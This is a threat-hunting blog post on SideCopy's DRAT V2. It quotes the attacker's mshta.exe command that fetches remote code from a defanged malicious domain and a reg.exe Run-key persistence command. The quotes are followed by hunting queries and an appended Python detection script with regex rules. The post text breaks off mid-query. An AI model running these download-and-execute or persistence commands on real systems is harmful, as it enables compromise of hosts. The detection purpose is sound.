177. Hunting for SideCopy's DRAT V2

Hello everyone! Let's look at another example of leveraging the ClickFix technique. This time it's SideCopy - a sub-cluster of Transparent Tribe. Recently Recorded Future reported on a new version of DRAT - let's look at some detection and hunting opportunities.

First of all, the adversary abuses mshta.exe:

C:\Windows\System32\mshta.exe hxxps://trade4wealth[.]in/admin/assets/css/default/index.php

It's a great candidate for hunting! For example, we can search for mshta.exe executing files from remote servers:

event_type: "processcreatewin" AND proc_file_name: "mshta.exe" AND cmdline: ("http" OR "https")

Next - it abuses reg.exe to establish persistence for DRAT:

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Edgre" /t REG_SZ /F /D "cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf

Here we can hunt for adding files located under %PUBLIC% to the Run key, for example:

event_typ...
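The two hunts above, written as detection logic over a handful of constructed process-creation events. This is an added example, not code from the original post or from Recorded Future's reporting: the field names follow the post's query syntax, the Run-key rule is reconstructed from the post's description (the query itself is truncated here), and the URL in the sample event is a placeholder.

```python
import re

# Field names follow the hunting queries quoted in the post (event_type,
# proc_file_name, cmdline). Events are constructed for this example; the
# reg.exe command is the one quoted in the post, the URL is a placeholder.
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin", "proc_file_name": "mshta.exe",
     "cmdline": "C:\\Windows\\System32\\mshta.exe https://example.invalid/index.php"},
    {"event_type": "processcreatewin", "proc_file_name": "mshta.exe",
     "cmdline": "mshta.exe C:\\Program Files\\Vendor\\setup.hta"},  # local HTA, no hit
    {"event_type": "processcreatewin", "proc_file_name": "reg.exe",
     "cmdline": 'REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /V "Edgre" '
                '/t REG_SZ /F /D "cmd /C start C:\\Users\\Public\\USOShared-1de48789-1285\\zuidrt.pdf"'},
    {"event_type": "processcreatewin", "proc_file_name": "reg.exe",  # benign Run value, no hit
     "cmdline": 'REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /V "OneDrive" '
                '/d "C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"'},
    {"event_type": "processcreatewin", "proc_file_name": "cmd.exe",
     "cmdline": "cmd.exe /c dir C:\\Users\\Public"},  # touches Public but is not a Run-key write
]

# Run and RunOnce under any hive; %PUBLIC% expands to C:\Users\Public by default.
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\b", re.I)
PUBLIC_RE = re.compile(r"(?:[A-Z]:\\Users\\Public\\|%PUBLIC%)", re.I)

def is_proc_create(ev, image):
    return ev.get("event_type") == "processcreatewin" and ev.get("proc_file_name", "").lower() == image

def mshta_remote(ev):
    """Hunt 1 from the post: mshta.exe launched with an http/https URL on its command line."""
    return is_proc_create(ev, "mshta.exe") and re.search(r"https?://", ev["cmdline"], re.I) is not None

def run_key_public(ev):
    """Hunt 2 from the post: reg.exe adding a Run-key value that points under %PUBLIC%."""
    cmd = ev["cmdline"]
    return (is_proc_create(ev, "reg.exe") and re.search(r"\badd\b", cmd, re.I) is not None
            and RUN_KEY_RE.search(cmd) is not None and PUBLIC_RE.search(cmd) is not None)

def hunt(events):
    """Return (rule_name, cmdline) for every event that matches either hunt."""
    hits = []
    for ev in events:
        if mshta_remote(ev):
            hits.append(("mshta_remote_content", ev["cmdline"]))
        if run_key_public(ev):
            hits.append(("run_key_public_path", ev["cmdline"]))
    return hits

if __name__ == "__main__":
    for rule, cmdline in hunt(SAMPLE_EVENTS):
        print(f"[{rule}] {cmdline}")
```

The benign OneDrive Run value and the cmd.exe listing of the Public folder are included to show that the %PUBLIC% filter and the reg.exe image check, not the Run key alone, are what keep the second hunt quiet on normal hosts.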